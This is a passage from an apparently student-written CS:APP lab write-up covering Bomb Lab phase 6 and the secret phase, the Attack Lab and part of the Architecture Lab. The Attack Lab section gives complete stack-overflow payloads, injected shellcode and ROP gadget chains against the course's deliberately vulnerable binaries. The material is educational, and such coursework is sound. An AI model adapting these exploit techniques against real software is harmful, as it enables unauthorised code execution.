numbers</span></span><br><span class="line"><span class="type">int</span> inputNum[<span class="number">6</span>];</span><br><span class="line"><span class="type">int</span>* r13d = inputNum;</span><br><span class="line"><span class="type">int</span> r12d = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">while</span>(<span 
class="literal">true</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span>* rbp = r13d;</span><br><span class="line">  <span class="comment">// 所输入的数必须大于1，小于6</span></span><br><span class="line">  <span class="keyword">if</span>(*rbp - <span class="number">1</span> &lt;= <span class="number">5</span>) <span class="comment">// 无符号比较</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="comment">// 如果遍历完成，则跳出循环</span></span><br><span class="line">    <span class="keyword">if</span>(++r12d == <span class="number">6</span>)</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="type">int</span> ebx = r12d;</span><br><span class="line">    <span class="comment">// 循环检测字符是否相等</span></span><br><span class="line">    <span class="keyword">do</span>&#123;</span><br><span class="line">      <span class="keyword">if</span>(inputNum[ebx] == rbp)</span><br><span class="line">        <span class="built_in">explode_bomb</span>();</span><br><span class="line">      ebx++;</span><br><span class="line">    &#125;<span class="keyword">while</span>(ebx &lt;= <span class="number">5</span>);</span><br><span class="line">    <span class="comment">// 指向下一个数组位置</span></span><br><span class="line">    r13d++;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    <span class="built_in">explode_bomb</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这个代码比较简单，因为它实际上就是遍历检测所输入的6个数是否出现重复，如果存在重复则爆炸。同时还将输入的数字限制在了1-6中(注意其中的数字是 <strong>无符号</strong> 整数)</p></li><li><p>第二部分是一个简单的循环。这个循环将输入的六个数字设置为 <code>inputNum[i] = 7 - inputNum[i]</code><br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_6_2.png" alt="img"></p></li><li><p>第三部分同样是一个循环，为便于说明，将该部分的汇编代码转换为如下的C代码：</p><blockquote><p>为了便于直观，调换了部分代码的顺序，不影响最终结果</p></blockquote><figure 
class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> rsi = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">while</span>(<span class="literal">true</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> ecx = inputNum[rsi];</span><br><span class="line">  <span class="keyword">if</span>(inputNum[rsi] &lt;= <span class="number">1</span>)</span><br><span class="line">    <span class="comment">// node1 is the head of a linked list; each node holds an int and a pointer to the next node</span></span><br><span class="line">    list[rsi] = &amp;node1;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="type">int</span> eax = <span class="number">1</span>;</span><br><span class="line">    node* rdx = &amp;node1;</span><br><span class="line">    <span class="keyword">do</span>&#123;</span><br><span class="line">      rdx = rdx-&gt;next;</span><br><span class="line">      eax++;</span><br><span class="line">    &#125;<span class="keyword">while</span>(eax != ecx);</span><br><span class="line">    <span class="comment">// rdx now points to the ecx-th node of the list</span></span><br><span 
class="line">    list[rsi] = rdx;</span><br><span class="line">  &#125;</span><br><span class="line">  rsi++;</span><br><span class="line">  <span class="keyword">if</span>(rsi == <span class="number">6</span>)</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The program walks the converted values and uses each one as an index to look up the address of the node at that position in the linked list, storing the addresses on the stack.</p></li><li><p>The fourth part is, once again, a loop.<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_6_3.png" alt="img"><br>This loop relinks the original list so that it follows the order of the pointers stored on the stack. The code is as follows</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">rcx = list[<span class="number">0</span>];</span><br><span class="line"><span class="keyword">for</span>(node** rax = &amp;list[<span class="number">1</span>]; rax != &amp;list[<span class="number">6</span>]; rax++)</span><br><span class="line">&#123;</span><br><span class="line">  rcx-&gt;next = *rax;</span><br><span class="line">  rcx = *rax;</span><br><span class="line">&#125;</span><br><span class="line">rcx-&gt;next = <span class="literal">NULL</span>;</span><br></pre></td></tr></table></figure></li><li><p>The fifth part is a validation loop. It walks the list in its new order and compares the values: they must be strictly decreasing from node to node, otherwise the bomb explodes.<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_6_4.png" alt="img"><br>The values stored in the nodes are ordered <strong>node3 &gt; node4 &gt; node5 &gt; node6 &gt; node1 &gt; node2</strong><br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_6_5.png" alt="img"><br>Undoing the <code>7 - x</code> conversion from the second part finally gives the answer to phase 6: <code>4 3 2 1 6 5</code></p></li></ul><h3 id="7-secret-phase">7) secret_phase</h3><ul><li><p>After all six phases are passed, stepping into <code>phase_defused</code> reveals a hidden phase.<br>Two checks must be passed before the hidden phase is entered.<br><img 
src="/2020/07/csapp-lab-writeup/phases_defuse_1.png" alt="img"><br>Dumping the memory that holds the string passed to <code>sscanf</code> in the first check shows that it is the input line for phase 4<br>Function arguments:<br><img src="/2020/07/csapp-lab-writeup/phases_defuse_2.png" alt="img"><br>Memory contents:<br><img src="/2020/07/csapp-lab-writeup/phases_defuse_3.png" alt="img"><br>The string compared in the second check is<br><img src="/2020/07/csapp-lab-writeup/phases_defuse_4.png" alt="img"><br>So appending the string <code>DrEvil</code> to the phase 4 input unlocks the hidden phase <code>secret_phase</code>.</p></li><li><p><code>secret_phase</code> first reads a number <code>inputNum</code>, which must satisfy <code>(inputNum - 1) &lt;= 0x3e8(1000)</code>; that is, the number must be at most 1001 (the comparison is unsigned, so it must also be at least 1).<br>It then calls <code>fun7(&amp;n1, inputNum)</code>. The phase is passed when this function returns 2.<br>The global variable <code>n1</code> is a tree node; all the tree nodes reachable from it are shown below<br><img src="/2020/07/csapp-lab-writeup/secret_phase_1.png" alt="img"><br>To make it easier to follow, the assembly of <code>fun7</code> is translated into C:</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">fun7</span><span class="params">(treeNode* node, <span class="type">int</span> num)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">if</span>(node == <span class="literal">NULL</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">  <span 
class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span>(node-&gt;val &lt;= num)</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span>(node-&gt;Val == num)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> <span class="number">2</span> * <span class="built_in">fun7</span>(node-&gt;right, num) + <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">      <span class="keyword">return</span> <span class="number">2</span> * <span class="built_in">fun7</span>(node-&gt;left, num);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>易知，若需<code>fun7(&amp;n1, inputNum) == 2</code>, 则要进行如下操作</p><ul><li>调用<strong>fun7(&amp;n1, inputNum)</strong>。此时 <strong>n1.val == 0x24</strong></li><li>递归向下调用<strong>fun7(arg.left, inputNum)</strong>, 此时 <strong>arg.val == 0x8</strong></li><li>再次递归向下调用<strong>fun7(newArg.right, inputNum)</strong>, 此时 <strong>newArg.val == 0x16 == 22</strong></li><li>在这最后调用的 <strong>fun7(newArg.right, inputNum)</strong> 中返回0<br>综上所述，本次输入的数字应为<code>22</code></li></ul></li><li><p>最后的输入文本为</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Border relations with Canada have never been better.</span><br><span class="line">1 2 4 8 16 32</span><br><span class="line">7 327</span><br><span 
class="line">0 0 DrEvil</span><br><span class="line">ionefg</span><br><span class="line">4 3 2 1 6 5</span><br><span class="line">22</span><br></pre></td></tr></table></figure><p>Screenshot of the defused bomb<br><img src="/2020/07/csapp-lab-writeup/success.png" alt="img"></p></li></ul><h2 id="3-Attack-Lab">3. Attack Lab</h2><ul><li>The Attack Lab consists of five attacks that use two techniques: <strong>code injection</strong> and <strong>ROP</strong> (return-oriented programming)</li></ul><h3 id="1-Code-Injection">1) Code Injection</h3><ul><li><p>The <code>ctarget</code> file is used for the code injection attacks.</p></li><li><p>In these attacks, we overflow a buffer and inject attack code to achieve a specific goal.</p></li><li><p>The <code>stable_launch</code> function does something interesting: the program mmaps a block of RWX memory and moves the stack pointer into this block, which sits at a fixed address. This makes the later code execution possible, since data on the original stack would not be executable (NX)<br><img src="/2020/07/csapp-lab-writeup/ctarget_1.png" alt="img"></p></li><li><p>The injection point is in the <code>getbuf</code> function, which calls <code>gets</code> and can therefore overflow.<br>Inside this function the string is stored at address <code>0x5561dc78</code> and the function's return address is stored at <code>0x5561dca0</code>, an offset of <code>40</code> bytes<br><img src="/2020/07/csapp-lab-writeup/ctarget_2.png" alt="img"></p></li><li><p><strong>phase1</strong></p><ul><li><p>This level only requires redirecting control flow to the <code>touch1</code> function, whose address is <code>0x4017c0</code></p></li><li><p>We use the stack overflow to overwrite the <strong>return address</strong> on the stack</p></li><li><p>The final input file is shown below</p><blockquote><p>The <code>00</code> bytes must not be omitted, because they are part of the function address (pointers are 8 bytes on a 64-bit system)<br>Mind the <strong>little-endian</strong> byte order</p></blockquote>  <figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">c0 17 40 00 00 00 00 00</span><br></pre></td></tr></table></figure><p>Screenshot of passing this level</p><p><img 
src="/2020/07/csapp-lab-writeup/ctarget_touch1.png" alt="img"></p></li></ul></li><li><p><strong>phase2</strong></p><ul><li><p><code>touch2</code> differs from <code>touch1</code> in that it adds a register comparison. The level is passed only when <code>%edi == &lt;cookie&gt;</code>.<br><img src="/2020/07/csapp-lab-writeup/ctarget_3.png" alt="img"></p></li><li><p>This time we need to place code on the stack so that, when <code>getbuf</code> returns, control <strong>jumps to the code on the stack</strong>, which <strong>sets the %rdi register</strong> and finally <strong>jumps to <code>touch2</code></strong>. The code is</p><blockquote><p>The address of <code>touch2</code> is <code>0x4017ec</code></p></blockquote>  <figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">movq</span> <span class="number">$0</span>x59b997fa, %rdi # <span class="number">0x59b997fa</span> is my cookie</span><br><span class="line"><span class="keyword">push</span> <span class="number">$0</span>x4017ec</span><br><span class="line"><span class="keyword">ret</span></span><br></pre></td></tr></table></figure><p>Then run the following command to assemble it into machine code and display the details.</p>  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -c asm.s -o asm.o &amp;&amp; objdump -d asm.o</span><br></pre></td></tr></table></figure><p><img src="/2020/07/csapp-lab-writeup/ctarget_asm_1.png" alt="img"></p></li><li><p>The final input data is</p>  <figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">48 c7 c7 fa 97 b9 59 68</span><br><span class="line">ec 17 40 00 c3 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 
31 31 31 31</span><br><span class="line">78 dc 61 55 00 00 00 00  </span><br></pre></td></tr></table></figure><p>Screenshot of passing this level<br><img src="/2020/07/csapp-lab-writeup/ctarget_touch2.png" alt="img"></p></li></ul></li><li><p><strong>phase3</strong></p><ul><li><p>Like <code>touch2</code>, <code>touch3</code> contains a comparison that must succeed to pass the level.<br>The difference is that <code>touch3</code> delegates the comparison to another function, <code>hexmatch</code>, whose arguments are <code>cookie</code> and the first argument of <code>touch3</code>, <code>%rdi</code>.<br><img src="/2020/07/csapp-lab-writeup/ctarget_3_2.png" alt="img"></p></li><li><p>Analyzing <code>hexmatch</code> shows that the level is passed if <code>%rdi == 0x5561dc13</code> at the moment of the overflow.<br><img src="/2020/07/csapp-lab-writeup/ctarget_3_1.png" alt="img"></p></li><li><p>Because this level sets the same register as the second level, the input for this level can be obtained by editing the input for the second level directly.</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">48 c7 c7 13 dc 61 55 68</span><br><span class="line">fa 18 40 00 c3 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">78 dc 61 55 00 00 00 00</span><br></pre></td></tr></table></figure><p><img src="/2020/07/csapp-lab-writeup/ctarget_3_3.png" alt="img"></p></li><li><p><strong>Note!</strong> This is actually an <strong>unintended solution</strong>. By design, the memory address that holds the cookie string is supposed to be random.</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="comment">/* Compare string to hex representation of unsigned value */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">hexmatch</span><span class="params">(<span class="type">unsigned</span> val, <span class="type">char</span> *sval)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">char</span> cbuf[<span class="number">110</span>];</span><br><span class="line">  <span class="comment">/* Make position of check string unpredictable */</span></span><br><span class="line">  <span class="type">char</span> *s = cbuf + <span class="built_in">random</span>() % <span class="number">100</span>;</span><br><span class="line">  <span class="built_in">sprintf</span>(s, <span class="string">&quot;%.8x&quot;</span>, val);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">strncmp</span>(sval, s, <span class="number">9</span>) == <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>However, the program never seeds the random number generator, so <code>random()</code> always produces the same sequence, and the cookie string therefore always ends up at the same memory address.</p></li></ul></li></ul><h3 id="2-ROP">2) ROP</h3><ul><li><code>rtarget</code>: this file is used for the ROP experiments</li><li>This file uses <strong>stack randomization (ASLR)</strong> and a <strong>non-executable stack (NX)</strong> to prevent code injection, so we must use a <strong>ROP</strong> attack to reach our goal.</li><li>The offset between the <code>gets</code> input buffer and the saved return address is still <code>40</code>.</li><li>Below is a reference table of instructions and their machine encodings<br><img src="/2020/07/csapp-lab-writeup/attack_lab_ref.png" alt="img"></li><li><strong>phase4</strong><ul><li><p>Use <code>objdump -S rtarget &gt; rtarget.s</code> to dump the disassembly of <code>rtarget</code></p><blockquote><p>Only the parts of the disassembly that ROP may use are shown here</p></blockquote>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0000000000401</span>9a7 &lt;addval_219&gt;:</span><br><span class="line">  <span class="number">4019</span>a7: <span class="number">8</span>d <span class="number">87</span> <span class="number">51</span> <span class="number">73</span> <span class="number">58</span> <span class="number">90</span>     lea    <span class="number">-0x6fa78caf</span>(%rdi),%eax</span><br><span class="line">  <span class="number">4019</span>ad: c3                    retq  </span><br><span class="line"></span><br><span class="line"><span class="number">0000000000401</span>9a0 &lt;addval_273&gt;:</span><br><span class="line">  <span class="number">4019</span>a0: <span class="number">8</span>d <span class="number">87</span> <span class="number">48</span> <span class="number">89</span> c7 c3     lea    <span class="number">-0x3c3876b8</span>(%rdi),%eax</span><br><span class="line">  <span class="number">4019</span>a6: c3                    retq</span><br></pre></td></tr></table></figure><ul><li><p>Note that <code>addval_219</code> contains the byte sequence <code>58 90 c3</code>, where <code>58</code> encodes <code>popq %rax</code>, <code>90</code> encodes <code>nop</code>, and <code>c3</code> encodes <code>ret</code>. This short byte sequence can be used to pop a value from the stack into <code>%rax</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">4019</span>ab: <span class="number">58</span>                    popq %rax</span><br><span class="line"><span class="number">4019</span>ac: <span class="number">90</span>                    nop</span><br><span class="line"><span class="number">4019</span>ad: c3                    retq</span><br></pre></td></tr></table></figure></li><li><p>Likewise, <code>addval_273</code> contains the byte sequence <code>48 89 c7 c3</code>, where <code>48 89 
c7</code> encodes <code>movq %rax, %rdi</code> and <code>c3</code> encodes <code>ret</code>. We can therefore use this gadget to copy the value in <code>%rax</code> into <code>%rdi</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">4019</span>a2: <span class="number">48</span> <span class="number">89</span> c7              movq %rax, %rdi</span><br><span class="line"><span class="number">4019</span>a5: c3                    retq</span><br></pre></td></tr></table></figure></li><li><p>Together, the <code>popq %rax</code> and <code>movq %rax, %rdi</code> gadgets effectively form a <code>popq %rdi</code> instruction, which lets us set <code>%rdi</code> as required. The result looks like this:<br><img src="/2020/07/csapp-lab-writeup/rtarget_2_1.png" alt="img"></p></li></ul></li><li><p>In summary, we need to:</p><ul><li>Overflow the stack to jump to <code>popq %rax</code></li><li>Jump to <code>movq %rax, %rdi</code></li><li>Jump to <code>touch2</code> (at address <code>0x4017ec</code>)</li></ul><p>The final input data is as follows</p>  <figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">ab 19 40 00 00 00 00 00</span><br><span class="line">fa 97 b9 59 00 00 00 00</span><br><span class="line">a2 19 40 00 00 00 00 00</span><br><span class="line">ec 17 40 00 00 00 00 00</span><br></pre></td></tr></table></figure><p>Screenshot of passing the phase:<br><img src="/2020/07/csapp-lab-writeup/rtarget_2_2.png" 
alt="img"></p></li></ul></li><li><strong>phase5</strong><ul><li><p>This phase mainly uses the following functions</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0000000000401</span>a03 &lt;addval_190&gt;:</span><br><span class="line">  <span class="number">401</span>a03: <span class="number">8</span>d <span class="number">87</span> <span class="number">41</span> <span class="number">48</span> <span class="number">89</span> e0     lea    <span class="number">-0x1f76b7bf</span>(%rdi),%eax</span><br><span class="line">  <span class="number">401</span>a09: c3                    retq</span><br><span class="line"><span class="number">0000000000401</span>9d6 &lt;add_xy&gt;:</span><br><span class="line">  <span class="number">4019</span>d6: <span class="number">48</span> <span class="number">8</span>d <span class="number">04</span> <span class="number">37</span>           <span class="built_in">lea</span>    (%rdi,%rsi,<span class="number">1</span>),%rax</span><br><span class="line">  <span class="number">4019</span>da: c3                    retq</span><br><span class="line"><span class="number">0000000000401</span>9a0 &lt;addval_273&gt;:</span><br><span class="line">  <span class="number">4019</span>a0: <span class="number">8</span>d <span class="number">87</span> <span class="number">48</span> <span class="number">89</span> c7 c3     lea    <span class="number">-0x3c3876b8</span>(%rdi),%eax</span><br><span class="line">  <span class="number">4019</span>a6: c3                    retq</span><br></pre></td></tr></table></figure><p>The usable gadgets extracted from each of them are</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">401</span>a06: <span class="number">48</span> <span class="number">89</span> e0              movq %rsp, %rax</span><br><span class="line"><span class="number">401</span>a09: c3                    retq</span><br><span class="line"></span><br><span class="line"><span class="number">4019</span>d8: <span class="number">04</span> <span class="number">37</span>                 add $<span class="number">0x37</span>, %al</span><br><span class="line"><span class="number">4019</span>da: c3                    retq</span><br><span class="line"></span><br><span class="line"><span class="number">4019</span>a2: <span class="number">48</span> <span class="number">89</span> c7              movq %rax, %rdi</span><br><span class="line"><span class="number">4019</span>a5: c3                    retq</span><br></pre></td></tr></table></figure><p>Combined, these gadgets yield a stack address at a fixed offset. If the cookie string is written at that address, we achieve the goal of <strong>making %rdi point to the cookie string</strong>, which passes this phase.</p><p>The result looks like this:<br><img src="/2020/07/csapp-lab-writeup/rtaget_3_1.png" alt="img"></p></li><li><p>The final input data is as follows</p><blockquote><p>Note that line 13 has only 7 bytes. This is intentional: the cookie string must start exactly 0x37 (55) bytes past the address captured by <code>movq %rsp, %rax</code>.</p></blockquote><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">31 31 31 31 31 31 31 
31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">06 1a 40 00 00 00 00 00</span><br><span class="line">d8 19 40 00 00 00 00 00</span><br><span class="line">a2 19 40 00 00 00 00 00</span><br><span class="line">fa 18 40 00 00 00 00 00</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31</span><br><span class="line">35 39 62 39 39 37 66 61</span><br></pre></td></tr></table></figure><p>Screenshot of passing the phase:<br><img src="/2020/07/csapp-lab-writeup/rtarget_3_2.png" alt="img"></p></li></ul></li></ul><h2 id="4-Architecture-Lab">4. Architecture Lab</h2><h3 id="1-Part-A">1) Part A</h3><ul><li><p>The working directory for this part is <code>arch-lab/sim/misc</code></p></li><li><p>In Part A, we hand-write the three functions in <code>example.c</code> in <code>Y86</code> assembly (note: not <code>x86</code>) to get familiar with basic <code>Y86</code> syntax. The implementation is fairly simple; just follow the code in CSAPP as a template.</p></li><li><p>The shell script used to assemble and run <code>Y86</code> programs is as follows</p>  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">./yas $*.ys &amp;&amp; ./yis $*.yo</span><br></pre></td></tr></table></figure><p>The output looks like this:<br><img src="/2020/07/csapp-lab-writeup/y86_disp.png" alt="img"></p></li><li><p><code>Y86</code> assembly for <code>sum_list</code> - <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20A/sum.ys">github</a></p></li><li><p><code>Y86</code> assembly for <code>rsum_list</code> - <a 
href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20A/rsum.ys">github</a></p><blockquote><p>Note that when calling a function recursively, certain registers must be saved on the stack so that the caller can still use them afterwards.</p></blockquote></li><li><p><code>Y86</code> assembly for <code>copy_block</code> - <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20A/copy.ys">github</a></p></li></ul><h3 id="2-Part-B">2) Part B</h3><ul><li><p>This part adds the <code>iaddq</code> instruction to the SEQ processor. The file to modify is <code>seq-full.hcl</code>, and the working directory is <code>arch-lab/sim/seq</code></p></li><li><p>Because <code>iaddq</code> involves both an ALU operation and an immediate operand, it can be implemented by following how <code>IOPQ</code> and <code>IIRMOVQ</code> are handled in <code>seq-full.hcl</code>.<br>The modified parts are excerpted below; the complete file is on <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20B/seq-full.hcl">github</a>, where every change is marked with a comment in Chinese.</p><blockquote><p>Note: when writing HCL, assembly syntax highlighting is a decent choice.</p></blockquote>  <figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span 
class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"># Instruction code for iaddq instruction</span><br><span class="line">wordsig IIADDQ  <span class="string">&#x27;I_IADDQ&#x27;</span></span><br><span class="line"></span><br><span class="line"># Add IIADDQ to the set of valid instructions</span><br><span class="line">bool instr_valid = icode <span class="keyword">in</span></span><br><span class="line">&#123; INOP, IHALT, IRRMOVQ, IIRMOVQ, IRMMOVQ, IMRMOVQ,</span><br><span class="line">        IOPQ, IJXX, ICALL, <span class="keyword">IRET</span>, IPUSHQ, IPOPQ, IIADDQ &#125;<span class="comment">;</span></span><br><span class="line"></span><br><span class="line"># IIADDQ takes a register operand, so it needs the extra register-specifier byte; add it to this set</span><br><span class="line">bool need_regids =</span><br><span class="line">  icode <span class="keyword">in</span> &#123; IRRMOVQ, IOPQ, IPUSHQ, IPOPQ,</span><br><span class="line">        IIRMOVQ, IRMMOVQ, IMRMOVQ, IIADDQ  &#125;<span class="comment">;</span></span><br><span class="line"></span><br><span class="line"># IIADDQ takes a constant, so add it to this set</span><br><span class="line">bool need_valC =</span><br><span class="line">  icode <span class="keyword">in</span> &#123; IIRMOVQ, IRMMOVQ, IMRMOVQ, IJXX, ICALL, IIADDQ &#125;<span class="comment">;</span></span><br><span class="line"></span><br><span class="line">## IIADDQ needs to read the value of its right-hand register (rB), so add it to this set</span><br><span 
